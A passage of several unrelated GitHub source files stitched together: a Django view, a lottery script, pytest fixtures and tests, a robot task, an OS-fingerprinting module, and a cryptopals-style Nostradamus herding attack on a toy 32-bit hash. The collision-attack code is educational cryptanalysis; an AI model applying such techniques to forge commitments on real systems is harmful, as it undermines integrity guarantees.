    owner is now resolved (404 on an unknown id) and named correctly.
    """
    owner = get_object_or_404(User, pk=user_id)
    item_list = Item.objects.filter(user__pk=user_id)
    messages.add_message(
        request, messages.INFO, f"Showing items owned by: {owner.username}"
    )
    context = {
        "item_list": item_list,
    }
    return render(request, "index.html", context=context)
| HomayoonAlimohammadi/divar | divar-clone/core/views.py | views.py | py | 7,084 | python | en | code | 0 | github-code | 36 |
from random import randint, sample  # sample draws *distinct* numbers

# Draw the winning numbers: 6 distinct values between 1 and 60.
# (Fix: the original used randint in a loop, which could repeat a number
# and make six distinct matches impossible.)
jogo = sample(range(1, 61), 6)

listaJogadores = []  # every player's 6 guesses
acertos = []         # per player, the drawn numbers they hit
quadraLista = []     # players with 4 hits
quinaLista = []      # players with 5 hits
megaLista = []       # players with all 6 hits

print('========== NÚMERO DA MEGASENA ==========')
print(jogo)
print('')
total = int(input("PREMIAÇÃO TOTAL: R$ "))
print('=' * 40)

# Collect players until the operator answers anything but 1.
jogadas = 1
while jogadas == 1:
    jogadores = []  # reset the current player's numbers
    count = 1
    for i in range(6):
        jogadores.append(int(input(f'{count}º Número: ')))
        count += 1
    print('')
    listaJogadores.append(jogadores)
    jogadas = int(input("1-Gerar Mais Jogadores 0-Encerrar: "))

# Count how many drawn numbers each player hit.  (Fix: distinct matches
# only -- the original nested index loop could count a repeated guess or a
# repeated drawn number more than once.)
for jogador in listaJogadores:
    jogadorAcertou = sorted(set(jogador) & set(jogo))
    acertos.append(jogadorAcertou)

# Classify every player by hit count: 4 = quadra, 5 = quina, 6 = mega.
for contador, lista in enumerate(acertos):
    if len(lista) == 4:
        quadraLista.append(listaJogadores[contador])
    elif len(lista) == 5:
        quinaLista.append(listaJogadores[contador])
    elif len(lista) == 6:
        megaLista.append(listaJogadores[contador])

print('')
if len(quadraLista) >= 1:
    print('========== QUADRA ==========')
    quadra = total * 0.2  # 20% of the pot split among quadra winners
    quadraPremio = quadra / len(quadraLista)
    print(f'{len(quadraLista)} Ganhador(es)')
    print(f'Número(s) ganhador(es): {quadraLista} ')
    print(f"Prêmio: R$ {quadraPremio:.2f}")
    print('')
if len(quinaLista) >= 1:
    print('========== QUINA ==========')
    quina = total * 0.3  # 30% of the pot split among quina winners
    premioQuina = quina / len(quinaLista)
    print(f'{len(quinaLista)} Ganhador(es)')
    print(f'Número(s) ganhador(es): {quinaLista} ')
    print(f"Prêmio: R$ {premioQuina:.2f}")
    print('')
if len(megaLista) >= 1:
    print('========== MEGA ==========')
    mega = total * 0.5  # 50% of the pot split among jackpot winners
    premioMega = mega / len(megaLista)
    print(f'{len(megaLista)} Ganhador(es)')
    print(f'Número(s) ganhador(es): {megaLista} ')
    print(f'Prêmio: R$ {premioMega:.2f}')
    print('')
9475668450 | """API related fixtures."""
from contextlib import contextmanager
from typing import Any, Callable, ContextManager, Generator
from uuid import uuid4
import pytest
import respx
from fastapi.testclient import TestClient
from httpx import Request, Response
from python_scaffold import api, settings
@pytest.fixture(scope="session")
def test_client() -> TestClient:
    """Test client of the service, shared across the whole test session.

    [Read here for more](https://fastapi.tiangolo.com/tutorial/testing/)
    """
    return TestClient(api.app)
@pytest.fixture()
def mock_api_auth() -> Callable[[Response | None], ContextManager[dict[str, respx.Route]]]:
    """Mock API for the auth API.

    Yields the registered respx routes keyed by name so tests can inspect
    call counts; an optional ``custom_response`` overrides the default
    201 + random token reply.
    """

    @contextmanager
    def _mock_api_auth(custom_response: Response | None = None) -> Generator[dict[str, respx.Route], None, None]:
        def _dynamic_message_response(request: Request) -> Response:
            # Without a custom response, answer 201 with a fresh random
            # access token on every call.
            if custom_response:
                return custom_response
            return Response(201, json={"access_token": uuid4().hex})

        route_auth = respx.post(url=settings.external_api_auth_url, name="auth").mock(
            side_effect=_dynamic_message_response
        )
        yield {"auth": route_auth}

    return _mock_api_auth
@pytest.fixture()
def example_message() -> str:
    """Just a simple example message used as the default mocked payload."""
    return "Hi i am a example message."
@pytest.fixture()
async def mock_api_messages(example_message: str) -> Callable[..., ContextManager[dict[str, respx.Route]]]:
    """Mock an external API.

    Returns a context-manager factory; ``messages`` entries flagged
    ``compacted`` get their ``base_message`` served for the matching
    ``messageid``, everything else falls back to *example_message*.
    """

    @contextmanager
    def _mock_api_messages(
        messages: list[dict[str, Any]] | None = None
    ) -> Generator[dict[str, respx.Route], None, None]:
        _default_messageid = "0" * 8

        def _dynamic_message_response(request: Request) -> Response:
            # The message id is the last path segment of the requested URL.
            request_url_id = str(request.url).split("/")[-1]
            if not request_url_id:
                return Response(403, json={"details": "Error in request: no ID was given"})
            message = example_message
            if len(messages_ids_to_respond_custom_msg):
                # NOTE(review): the [0] index raises IndexError when no
                # configured message matches the requested id -- confirm
                # callers only request ids they configured.
                message = [
                    msg.get("base_message", example_message)
                    for msg in messages_ids_to_respond_custom_msg
                    if msg.get("messageid", _default_messageid) == request_url_id
                ][0]
            if not len(message):
                return Response(404, json={"details": "Error in request: no MSCONS with this ID exists."})
            return Response(200, json=[{"edifact": message}])

        # Only messages flagged "compacted" are served with a custom body.
        messages_ids_to_respond_custom_msg = (
            [message for message in messages if bool(message["compacted"])] if messages else []
        )
        route_messages = respx.get(
            url=settings.external_api_base_url, path__startswith="/", name="get_some_messages"
        ).mock(side_effect=_dynamic_message_response)
        yield {"messages": route_messages}

    return _mock_api_messages
| IronicUsername/python-scaffold | python-scaffold/tests/test_python_scaffold/fixtures/api.py | api.py | py | 2,931 | python | en | code | 0 | github-code | 36 |
29701799964 | import os
import pandas as pd
import pandas.util.testing as pdt
import pytest
import six
@pytest.fixture
def sj_out_tab(tmpdir):
    """Write a small STAR ``SJ.out.tab`` splice-junction table to *tmpdir*.

    The whitespace-separated literal is parsed into a DataFrame and written
    back tab-separated; the resulting file path is returned.
    """
    s = """chr1 76 299 1 2 1 0 1 39
chr1 201 299 1 1 1 0 1 10
chr1 201 249 1 1 0 0 1 22
chr1 201 799 1 1 1 19 20 43
chr1 201 799 1 1 0 8 15 41
chr1 155832 164262 1 1 1 61 3 46
chr1 156087 156200 1 1 0 1 14 44
chr1 329977 334128 1 1 1 0 2 14
chr1 569184 569583 1 1 0 0 1 17
chr1 655581 659737 1 1 1 0 2 14
chr1 661725 662046 1 1 0 0 1 22
chr1 668587 671992 1 1 0 0 4 28
"""
    # Raw string for the regex separator: the original '\s+' relied on an
    # invalid escape sequence (DeprecationWarning; SyntaxWarning on 3.12+).
    df = pd.read_table(six.StringIO(s), header=None, sep=r'\s+')
    filename = '{0}/SJ.out.tab'.format(tmpdir)
    df.to_csv(filename, index=False, header=False, sep='\t')
    return filename
def test_read_sj_out_tab(sj_out_tab, simulated_unprocessed):
    # Parse the fixture SJ.out.tab and compare to the golden CSV; a junction's
    # start coordinate must always precede its stop coordinate.
    from outrigger.io.star import read_sj_out_tab
    test = read_sj_out_tab(sj_out_tab)
    csv = os.path.join(simulated_unprocessed, 'true_splice_junctions.csv')
    true = pd.read_csv(csv)
    assert (test.junction_start < test.junction_stop).all()
    pdt.assert_frame_equal(test, true)
def test_int_to_intron_motif():
    """STAR motif codes 0-6 map to their splice-site motif strings."""
    from outrigger.io.star import int_to_junction_motif
    expected = ['non-canonical', 'GT/AG', 'GT/AG', 'GC/AG', 'GC/AG',
                'AT/AC', 'AT/AC']
    observed = [int_to_junction_motif(code) for code in range(7)]
    assert observed == expected
@pytest.fixture
def splice_junction_csv(ignore_multimapping, tasic2016_intermediate):
    """Path to the expected splice-junction CSV.

    The filename embeds the ``ignore_multimapping`` flag (True/False), so a
    different golden file is selected per parameterization.
    """
    template = os.path.join(tasic2016_intermediate,
                            'index', 'star',
                            'splice_junctions_ignore_multimapping{}.csv')
    return template.format(str(ignore_multimapping))
def test_read_multiple_sj_out_tab(sj_filenames, ignore_multimapping,
                                  splice_junction_csv):
    # Concatenating multiple SJ.out.tab files should match the golden CSV
    # and carry a READS column.
    from outrigger.io.star import read_multiple_sj_out_tab
    from outrigger.common import READS
    # Read csv file and convert to numeric
    # NOTE(review): DataFrame.convert_objects was deprecated in pandas 0.17
    # and later removed (infer_objects is the modern replacement) -- this
    # test requires an old pinned pandas; confirm the environment.
    true = pd.read_csv(splice_junction_csv)
    true = true.convert_objects()
    test = read_multiple_sj_out_tab(
        sj_filenames, ignore_multimapping=ignore_multimapping)
    assert READS in test
    pdt.assert_frame_equal(test, true)
def test_make_metadata(tasic2016_intermediate, junction_reads):
    # Metadata built from the junction-reads table should equal the golden CSV.
    from outrigger.io.star import make_metadata
    csv = os.path.join(tasic2016_intermediate, 'junction_metadata.csv')
    true = pd.read_csv(csv)
    test = make_metadata(junction_reads)
    pdt.assert_frame_equal(test, true)
| YeoLab/outrigger | outrigger/tests/io/test_star.py | test_star.py | py | 2,952 | python | en | code | 60 | github-code | 36 |
19735072830 | #!/usr/bin/python3
from pyrob.api import *
@task(delay=0.05)
def task_4_11():
    """Paint the figure with six sweeps, each two cells shorter.

    The movement sequence is preserved verbatim from the working original;
    only the large block of commented-out alternative implementations was
    deleted (dead code).
    """
    for i in range(6):
        # descend the current column; two cells shorter each sweep
        for j in range(13-i*2):
            move_down()
        move_right()
        fill_cell()
        # fill the row back to the left
        for j in range(12-i*2):
            move_left()
            fill_cell()
        # NOTE(review): move_up() immediately followed by move_down() looks
        # like a no-op pair -- confirm against the task field before removing.
        move_up()
        move_down()
        move_left()
        move_down()
        move_right()
        fill_cell()
        move_down()
if __name__ == '__main__':
run_tasks()
| miketoreno88/robot-tasks-master-Python | task_21.py | task_21.py | py | 965 | python | en | code | 0 | github-code | 36 |
class Simulation:
    """A single chip-simulation record.

    The total cost is derived at construction time: chip count x unit cost.
    """

    def __init__(self, simnNo, simDate, chipName, chipCount, chipCost):
        self.simulationNumber = simnNo   # integer id, rendered zero-padded to 3 digits
        self.simulationDate = simDate    # date string, stored verbatim
        self.chipName = chipName
        self.chipCount = chipCount
        self.chipCost = chipCost         # cost per chip
        self.simulationCost = self.chipCost * self.chipCount

    def __str__(self):
        # e.g. "chipA: 005, 2020-01-01, $007.50"; a single f-string replaces
        # the original chain of string concatenations.
        return (f"{self.chipName}: {self.simulationNumber:03d}, "
                f"{self.simulationDate}, ${self.simulationCost:06.2f}")
class Employee:
    """An employee and the simulations assigned to them, keyed by number."""

    def __init__(self, employeeName, employeeID):
        self.employeeName = employeeName
        self.employeeID = employeeID
        self.simulationsDict = {}  # simulationNumber -> Simulation

    def addSimulation(self, sim):
        """Add (or replace) a simulation, keyed by its number.

        The original branched on key presence, but both branches performed
        the same assignment; a single assignment is equivalent.
        """
        self.simulationsDict[sim.simulationNumber] = sim

    def getSimulation(self, simNo):
        """Return the simulation numbered *simNo*, or None if absent."""
        return self.simulationsDict.get(simNo)

    def __str__(self):
        # e.g. "E1, Alice: 02 Simulations"
        return (f"{self.employeeID}, {self.employeeName}: "
                f"{len(self.simulationsDict):02d} Simulations")

    def getWorkload(self):
        """Build, print, and return the workload report.

        The report is the employee summary line followed by each simulation
        (sorted by its string form), one per line, no trailing newline when
        simulations exist. The print() is kept to preserve the original
        console side effect.
        """
        report = str(self) + "\n"
        report += "\n".join(sorted(str(sim) for sim in self.simulationsDict.values()))
        print(report)
        return report

    def addWorkload(self, fileName):
        """Load simulations from *fileName*, skipping the two header lines.

        Each data row is whitespace-separated: number date chip count $cost;
        the leading '$' is stripped from the cost column.
        """
        with open(fileName) as inputFile:
            content = inputFile.readlines()
        for line in content[2:]:
            fields = line.split()
            fields[4] = fields[4][1:]  # drop the leading '$'
            self.addSimulation(Simulation(int(fields[0]), fields[1], fields[2],
                                          int(fields[3]), float(fields[4])))
class Facility:
    """A named facility holding employees keyed by employee name."""

    def __init__(self, facilityName):
        self.facilityName = facilityName
        self.employeesDict = {}  # employeeName -> Employee

    def addEmployee(self, employee):
        """Add (or replace) an employee, keyed by name.

        (The original if/else branches were identical; one assignment
        suffices.)
        """
        self.employeesDict[employee.employeeName] = employee

    def getEmployees(self, *args):
        """Return the employees for the given names, in argument order.

        Raises KeyError for an unknown name, as before.
        """
        return [self.employeesDict[name] for name in args]

    def __str__(self):
        # Header line plus each employee's summary, sorted by string form.
        # The debug print() calls in the original were removed: __str__ must
        # be side-effect free.
        header = f"{self.facilityName}: {len(self.employeesDict):02d} Employees"
        summaries = sorted(str(emp) for emp in self.employeesDict.values())
        return header + "\n" + "\n".join(summaries)

    def getSimulation(self, simNo):
        """Search every employee's simulations for *simNo*; None if absent.

        Returns the matched object directly; the original re-looked it up by
        key, which could raise KeyError if a simulation's dict key and its
        simulationNumber attribute ever disagreed.
        """
        for employee in self.employeesDict.values():
            for sim in employee.simulationsDict.values():
                if sim.simulationNumber == simNo:
                    return sim
        return None
| arnavmittal/PythonAndSteganography | Lab07/Institute.py | Institute.py | py | 3,854 | python | en | code | 0 | github-code | 36 |
19033663462 | """OS identification method using netflows -- User-Agent
This module contains implementation of UserAgent class which is a method for OS
identification using User-Agent technique.
"""
import structlog
class UserAgent:
"""UserAgent OS identification technique
This class provides an interface for performing OS identification based on
netflow data.
"""
WIN_MAP = {'Windows 10.0': 'Windows 10',
'Windows 6.3': 'Windows 8.1',
'Windows 6.2': 'Windows 8',
'Windows 6.1': 'Windows 7',
'Windows 6.0': 'Windows Vista',
'Windows 5.2': 'Windows XP Professional x64',
'Windows 5.1': 'Windows XP',
'Windows 5.0': 'Windows 2000'}
API_MAP = {#'Android 1': 'Android 1.0',
#'Android 2': 'Android 1.1',
#'Android 3': 'Android 1.5',
#'Android 4': 'Android 1.6',
#'Android 5': 'Android 2.0',
#'Android 6': 'Android 2.0',
#'Android 7': 'Android 2.1',
#'Android 8': 'Android 2.2.x',
#'Android 9': 'Android 2.3',
'Android 10': 'Android 2.3',
'Android 11': 'Android 3.0',
'Android 12': 'Android 3.1',
'Android 13': 'Android 3.2',
'Android 14': 'Android 4.0',
'Android 15': 'Android 4.0',
'Android 16': 'Android 4.1',
'Android 17': 'Android 4.2',
'Android 18': 'Android 4.3',
'Android 19': 'Android 4.4',
'Android 21': 'Android 5.0',
'Android 22': 'Android 5.1',
'Android 23': 'Android 6.0',
'Android 24': 'Android 7.0',
'Android 25': 'Android 7.1',
'Android 26': 'Android 8.0',
'Android 27': 'Android 8.1',
'Android 28': 'Android 9'}
    @classmethod
    def convert_win(cls, os_name):
        """Map an NT version string (e.g. 'Windows 10.0') to its product
        name (e.g. 'Windows 10'); unknown strings pass through unchanged.

        :param os_name: windows version string
        :return: windows product name, or the input if not in WIN_MAP
        """
        return cls.WIN_MAP.get(os_name, os_name)
    @classmethod
    def convert_api(cls, os_name):
        """Map an Android API-level string (e.g. 'Android 23') to an OS
        version string (e.g. 'Android 6.0'); unknown inputs pass through.

        :param os_name: Android string carrying the API level
        :return: Android string with the OS version, or the input unchanged
        """
        return cls.API_MAP.get(os_name, os_name)
def __init__(self, logger=structlog.get_logger()):
self.logger = logger.bind(method="useragent")
    def run(self, flows):
        """Aggregate OS guesses per source IP from User-Agent flow fields.

        Flows lacking the "sa" key are skipped; flows missing any of the
        "hos"/"hosmaj"/"hosmin" keys are logged and skipped. Raw counts per
        OS name are normalized to fractions per IP before returning.

        :param flows: iterable of flow dicts to process
        :return: dictionary between IPs and predicted operating systems
                 (os name -> fraction of that IP's classified flows)
        """
        self.logger.info("Method start")
        result = {}
        for flow in flows:
            try:
                if "sa" not in flow:
                    continue
                sa = flow["sa"]
                os_name = flow["hos"]
                major = flow["hosmaj"]
                minor = flow["hosmin"]
                tmp = result.get(sa, {})
                if os_name != "N/A":
                    # Build "Name major.minor" where available, then translate
                    # NT versions and Android API levels to product names.
                    if major != "N/A":
                        os_name += " " + major
                        if minor != "N/A":
                            os_name += "." + minor
                    os_name = self.convert_win(os_name)
                    os_name = self.convert_api(os_name)
                    tmp[os_name] = tmp.get(os_name, 0) + 1
                if tmp:
                    result[sa] = tmp
            except KeyError as e:
                self.logger.warning('Flow is missing a necessary key!', key=str(e))
            except Exception as e:
                self.logger.warning(f'Exception while processing flow!', exception=str(e), flow=str(flow))
        # Normalize raw counts into per-IP fractions.
        for sa in result:
            total = sum(result[sa].values())
            for os_name in result[sa].keys():
                result[sa][os_name] /= total
        self.logger.info("Method finish")
        return result
| CSIRT-MU/CRUSOE | crusoe_observe/OS-parser-component/osrest/method/useragent.py | useragent.py | py | 4,053 | python | en | code | 9 | github-code | 36 |
72721112103 | from utilities import util
import binascii
# Challenge 54
STATE_LEN = 4  # 32 bits
BLOCK_SIZE = 16  # 128 bits
LEN_ENC_SIZE = 8  # 64 bits
# Fixed, arbitrary-but-deterministic 4-byte initial chaining state.
initial_state = b''.join([util.int_to_bytes((37*i + 42) % 256) for i in range(STATE_LEN)])
# Notes
# - Hash functions are sometimes used as proof of a secret prediction. A
# naive forgery would require a second pre-image attack.
# - We (again) exploit the difference in difficulty between collisions
# and second pre-images for this attack. We also exploit the ability
# to precompute a lot of collisions.
# - We create a funnel-like structure to hash many possible initial states
# into one single final state
# - The dummy hash function we use here has the following properties:
# * 32 bit state
# * 128 bit block
# * 64 bit length encoding
# Finding a second pre-image requires 2^32 operations (considered
# infeasible in terms of programming competitions), but finding a
# collision requires only 2^16 operations, which is comparatively trivial.
# - If we have enough leaves in our funnel (say, 2^10 = 1024), finding
# a collision takes only 2^22 time.
# - We'll use the following list of spoilers below as our 'prediction'.
spoilers = b'''
* Snape kills Dumbledore
* Jon is the son of Rhaegar and Lyanna
* Rosebud was his childhood sled
* Kristin Shephard shot JR
* Verbal is Keyser Soze
* Soylent Green is people
'''
def length_padding(message):
    """Merkle-Damgard style padding.

    Appends a 0x01 marker, zero-fills until the length is 8 mod 16, then
    appends the original length as a big-endian 64-bit integer.
    """
    original_length = len(message)
    padded = message + b'\x01'
    # zero-fill so the length-encoding field lands on a block boundary;
    # always add at least one full block of zeros when already aligned
    zero_count = (LEN_ENC_SIZE - len(padded)) % BLOCK_SIZE
    if zero_count == 0:
        zero_count = BLOCK_SIZE
    padded += b'\x00' * zero_count
    return padded + original_length.to_bytes(LEN_ENC_SIZE, 'big')
# merkle damgard construction using AES-128 as a compression function
def md_hash(message):
    """Hash *message*: pad, then fold each 16-byte block through the AES
    compression function, keeping only the first STATE_LEN (4) bytes of
    state each round. Returns the final state hex-encoded (8 hex chars).
    """
    h = initial_state
    M = length_padding(message)
    for i in range(len(M) // BLOCK_SIZE):
        Mi = util.get_ith_block(M, i, BLOCK_SIZE)
        # Compress via util.ecb_encrypt(block, padded_state) and truncate the
        # output back down to the 32-bit state.
        h = util.ecb_encrypt(Mi, util.padding(h, BLOCK_SIZE))[0:STATE_LEN]
    return binascii.hexlify(h)
# instrumented md hash (no padding, can specify initial state)
def md_hash_instrumented(M, H = initial_state):
    """Hash raw blocks *M* (already block-aligned, no padding applied)
    starting from chaining state *H*; returns the hex-encoded final state.
    Used by the attack to walk the hash state machine manually.
    """
    for i in range(len(M) // BLOCK_SIZE):
        Mi = util.get_ith_block(M, i, BLOCK_SIZE)
        H = util.ecb_encrypt(Mi, util.padding(H, BLOCK_SIZE))[0:STATE_LEN]
    return binascii.hexlify(H)
# Brute-force a single block that, hashed from state `h` (hex), lands on any
# state in `states`; returns (block, hex_state), or (None, None) on failure.
def find_second_preimage(h, states):
    start_state = binascii.unhexlify(h)  # hoisted: loop-invariant
    for candidate in range(1 << (STATE_LEN * 8)):
        block = candidate.to_bytes(BLOCK_SIZE, 'big')
        digest = md_hash_instrumented(block, start_state)
        if binascii.unhexlify(digest) in states:
            return block, digest
    return None, None
# finds two colliding blocks for a given initial state
# NOTE(review): this definition is immediately shadowed by the two-argument
# find_block_collision below, so it is dead code. Its `h` parameter is also
# never used -- md_hash_instrumented is called with the default state.
def find_block_collision(h):
    hash_table = {}
    for m in range(pow(2, STATE_LEN * 8)):
        message = m.to_bytes(BLOCK_SIZE, 'big')
        m_hash = md_hash_instrumented(message)
        if m_hash in hash_table:
            return (hash_table[m_hash], message, m_hash)
        hash_table[m_hash] = message
    return None, None, None
# finds two colliding blocks each with its own initial state
def find_block_collision(h1, h2):
    """Meet-in-the-middle search for blocks b1, b2 such that hashing b1 from
    state h1 equals hashing b2 from state h2; returns (b1, b2, hex_state).
    Expected cost ~2^16 thanks to the birthday bound on the 32-bit state.
    """
    h1_table = {}
    h2_table = {}
    for m in range(pow(2, STATE_LEN * 8)):
        message = m.to_bytes(BLOCK_SIZE, 'big')
        m_hash1 = md_hash_instrumented(message, h1)
        m_hash2 = md_hash_instrumented(message, h2)
        # A hit in the *other* table means the two chains collide.
        if m_hash1 in h2_table:
            return (message, h2_table[m_hash1], m_hash1)
        else:
            h1_table[m_hash1] = message
        if m_hash2 in h1_table:
            return (h1_table[m_hash2], message, m_hash2)
        else:
            h2_table[m_hash2] = message
    return None, None, None
# generates a funnel (binary tree) with depth k
def generate_funnel(k):
    """Precompute a depth-k collision funnel: 2^k leaf states that all hash
    to one final state via k levels of pairwise block collisions.
    """
    # the structure of the funnel will be two lists of length k
    # the ith element of the lists will be a list of length 2^(k - i)
    # the jth element of that list will be either the hash state or the data
    # depending on the list
    funnel_data = []
    funnel_hash = []
    # the initial states will be the 32 bit encodings
    # of the numbers 0 to 2^k - 1
    funnel_hash.append([])
    for i in range(1 << k):
        funnel_hash[0].append(i.to_bytes(STATE_LEN, 'big'))
    for i in range(k):
        funnel_data.append([])
        funnel_hash.append([])
        # Collide each adjacent pair of states at this level into one state
        # at the next level up.
        for j in range(1 << (k - i - 1)):
            init_state0 = funnel_hash[i][j*2]
            init_state1 = funnel_hash[i][j*2 + 1]
            d0, d1, h = find_block_collision(init_state0, init_state1)
            assert md_hash_instrumented(d0, init_state0) == md_hash_instrumented(d1, init_state1)
            funnel_data[i].append(d0)
            funnel_data[i].append(d1)
            funnel_hash[i + 1].append(binascii.unhexlify(h))
    return funnel_data, funnel_hash
if __name__ == '__main__':
    # generate the funnel
    k = 10
    funnel_data, funnel_hash = generate_funnel(k)
    # let's say our spoilers fit inside 11 blocks
    spoiler_blocks = 11
    # total forged-message length: spoilers + one glue block + k funnel blocks
    message_length = (spoiler_blocks + 1 + k) * BLOCK_SIZE
    dummy_message = b'\x00' * message_length
    padded_message = length_padding(dummy_message)
    padding_block = padded_message[message_length:]
    # generate prediction hash: commit to the funnel root plus padding,
    # *before* knowing the actual message content
    h_pred = md_hash_instrumented(padding_block, funnel_hash[k][0])
    print('Hash of prediction: {}'.format(h_pred.decode('utf-8')))
    print('... time passes ...')
    # construct spoiler message (space-padded to a block boundary)
    spoiler_message = spoilers + b' ' * (BLOCK_SIZE - (len(spoilers) % BLOCK_SIZE))
    h_spoiler = md_hash_instrumented(spoiler_message, initial_state)
    # find a glue block that routes the spoiler's hash state into some leaf
    glue, h_funnel_leaf = find_second_preimage(h_spoiler, funnel_hash[0])
    funnel_index = int(h_funnel_leaf, 16)
    # walk from that leaf up the funnel, appending the colliding block at
    # each level (halving the index as we ascend the binary tree)
    suffix = b''
    for i in range(k):
        suffix += funnel_data[i][funnel_index]
        funnel_index >>= 1
    final_message = spoiler_message + glue + suffix
    print('Prediction:')
    print(final_message)
    message_hash = md_hash(final_message)
    print('Message hash: {}'.format(message_hash.decode('utf-8')))
    assert message_hash == h_pred
    print('Success!')
| fortenforge/cryptopals | challenges/nostradamus_attack.py | nostradamus_attack.py | py | 6,007 | python | en | code | 13 | github-code | 36 |
70415685225 | import sys
from io import StringIO
from unittest import mock, TestCase
from unittest.mock import call, patch
from bs4 import BeautifulSoup
import ffq.ffq as ffq
from tests.mixins import TestMixin
from ffq.main import main
from ffq import __version__
class TestFfq(TestMixin, TestCase):
def test_validate_accessions(self):
SEARCH_TYPES = (
"SRR",
"ERR",
"DRR",
"SRP",
"ERP",
"DRP",
"SRX",
"GSE",
"GSM",
"DOI",
)
self.assertEqual(
[
{
"accession": "SRR244234",
"prefix": "SRR",
"valid": True,
"error": None,
},
{
"accession": "SRT44322",
"prefix": "UNKNOWN",
"valid": False,
"error": None,
},
{
"accession": "10.1016/J.CELL.2018.06.052",
"prefix": "DOI",
"valid": True,
"error": None,
},
{
"accession": "ASA10.1016/J.CELL.2018.06.052",
"prefix": "UNKNOWN", # TODO better DOI error handling
"valid": False,
"error": None,
},
{
"accession": "GSM12345",
"prefix": "GSM",
"valid": True,
"error": None,
},
{
"accession": "GSE567890",
"prefix": "GSE",
"valid": True,
"error": None,
},
],
ffq.validate_accessions(
[
"SRR244234",
"SRT44322",
"10.1016/j.cell.2018.06.052",
"ASA10.1016/j.cell.2018.06.052",
"GSM12345",
"GSE567890",
],
SEARCH_TYPES,
),
)
def test_parse_run(self):
self.maxDiff = None
with mock.patch(
"ffq.ffq.get_files_metadata_from_run"
) as get_files_metadata_from_run, mock.patch(
"ffq.ffq.ncbi_fetch_fasta"
) as ncbi_fetch_fasta, mock.patch(
"ffq.ffq.parse_ncbi_fetch_fasta"
) as parse_ncbi_fetch_fasta:
with open(self.run_path, "r") as f:
soup = BeautifulSoup(f.read(), "xml")
get_files_metadata_from_run.return_value = []
ncbi_fetch_fasta.return_value = []
parse_ncbi_fetch_fasta.return_value = []
self.assertEqual(
{
"accession": "SRR8426358",
"experiment": "SRX5234128",
"study": "SRP178136",
"sample": "SRS4237519",
"title": "Illumina HiSeq 4000 paired end sequencing; GSM3557675: old_Dropseq_1; Mus musculus; RNA-Seq",
"attributes": {
"ENA-SPOT-COUNT": 109256158,
"ENA-BASE-COUNT": 21984096610,
"ENA-FIRST-PUBLIC": "2019-01-27",
"ENA-LAST-UPDATE": "2019-01-27",
},
"files": {"aws": [], "ftp": [], "gcp": [], "ncbi": []},
},
ffq.parse_run(soup),
)
def test_parse_run_bam(self):
with open(self.run2_path, "r") as f:
soup = BeautifulSoup(f.read(), "xml")
self.maxDiff = None
self.assertEqual(
{
"accession": "SRR6835844",
"attributes": {
"ENA-BASE-COUNT": 12398988240,
"ENA-FIRST-PUBLIC": "2018-03-30",
"ENA-LAST-UPDATE": "2018-03-30",
"ENA-SPOT-COUNT": 137766536,
"assembly": "mm10",
"dangling_references": "treat_as_unmapped",
},
"experiment": "SRX3791763",
"files": {
"ftp": [
{
"accession": "SRR6835844",
"filename": "10X_P4_0.bam",
"filetype": "bam",
"filesize": 17093057664,
"filenumber": 1,
"md5": "5355fe6a07155026085ce46631268ab1",
"urltype": "ftp",
"url": "ftp://ftp.sra.ebi.ac.uk/vol1/SRA653/SRA653146/bam/10X_P4_0.bam",
}
],
"aws": [
{
"accession": "SRR6835844",
"filename": "10X_P4_0.bam.1",
"filetype": "bam",
"filesize": None,
"filenumber": 1,
"md5": None,
"urltype": "aws",
"url": "https://sra-pub-src-1.s3.amazonaws.com/SRR6835844/10X_P4_0.bam.1",
},
{
"accession": "SRR6835844",
"filename": "SRR6835844",
"filenumber": 1,
"filesize": None,
"filetype": "sra",
"md5": None,
"url": "https://sra-pub-run-odp.s3.amazonaws.com/sra/SRR6835844/SRR6835844",
"urltype": "aws",
},
],
"gcp": [
{
"accession": "SRR6835844",
"filename": "10X_P4_0.bam.1",
"filetype": "bam",
"filesize": None,
"filenumber": 1,
"md5": None,
"urltype": "gcp",
"url": "gs://sra-pub-src-1/SRR6835844/10X_P4_0.bam.1",
},
{
"accession": "SRR6835844",
"filename": "SRR6835844.1",
"filenumber": 1,
"filesize": None,
"filetype": "sra",
"md5": None,
"url": "gs://sra-pub-crun-7/SRR6835844/SRR6835844.1",
"urltype": "gcp",
},
],
"ncbi": [],
},
"sample": "SRS3044236",
"study": "SRP131661",
"title": "Illumina NovaSeq 6000 sequencing; GSM3040890: library 10X_P4_0; Mus musculus; RNA-Seq",
},
ffq.parse_run(soup),
)
def test_parse_sample(self):
with open(self.sample_path, "r") as f:
soup = BeautifulSoup(f.read(), "xml")
self.assertEqual(
{
"accession": "SRS4237519",
"title": "old_Dropseq_1",
"organism": "Mus musculus",
"attributes": {
"source_name": "Whole lung",
"tissue": "Whole lung",
"age": "24 months",
"number of cells": "799",
"ENA-SPOT-COUNT": 109256158,
"ENA-BASE-COUNT": 21984096610,
"ENA-FIRST-PUBLIC": "2019-01-11",
"ENA-LAST-UPDATE": "2019-01-11",
},
"experiments": "SRX5234128",
},
ffq.parse_sample(soup),
)
def test_parse_experiment_with_run(self):
with open(self.experiment_path, "r") as f:
soup = BeautifulSoup(f.read(), "xml")
self.maxDiff = None
self.assertEqual(
{
"accession": "SRX3517583",
"instrument": "HiSeq X Ten",
"platform": "ILLUMINA",
"runs": {
"SRR6425163": {
"accession": "SRR6425163",
"attributes": {
"ENA-BASE-COUNT": 74994708900,
"ENA-FIRST-PUBLIC": "2017-12-30",
"ENA-LAST-UPDATE": "2017-12-30",
"ENA-SPOT-COUNT": 249982363,
},
"experiment": "SRX3517583",
"files": {
"aws": [
{
"accession": "SRR6425163",
"filename": "J2_S1_L001_R1_001.fastq.gz",
"filenumber": 1,
"filesize": None,
"filetype": "fastq",
"md5": None,
"url": "s3://sra-pub-src-6/SRR6425163/J2_S1_L001_R1_001.fastq.gz",
"urltype": "aws",
},
{
"accession": "SRR6425163",
"filename": "J2_S1_L001_R2_001.fastq.gz",
"filenumber": 2,
"filesize": None,
"filetype": "fastq",
"md5": None,
"url": "s3://sra-pub-src-6/SRR6425163/J2_S1_L001_R2_001.fastq.gz",
"urltype": "aws",
},
{
"accession": "SRR6425163",
"filename": "SRR6425163",
"filenumber": 1,
"filesize": None,
"filetype": "sra",
"md5": None,
"url": "https://sra-pub-run-odp.s3.amazonaws.com/sra/SRR6425163/SRR6425163",
"urltype": "aws",
},
],
"ftp": [
{
"accession": "SRR6425163",
"filename": "SRR6425163_1.fastq.gz",
"filenumber": 1,
"filesize": 21858866426,
"filetype": "fastq",
"md5": "2dcf9ae4cfb30ec0aaf06edf0e3ca49a",
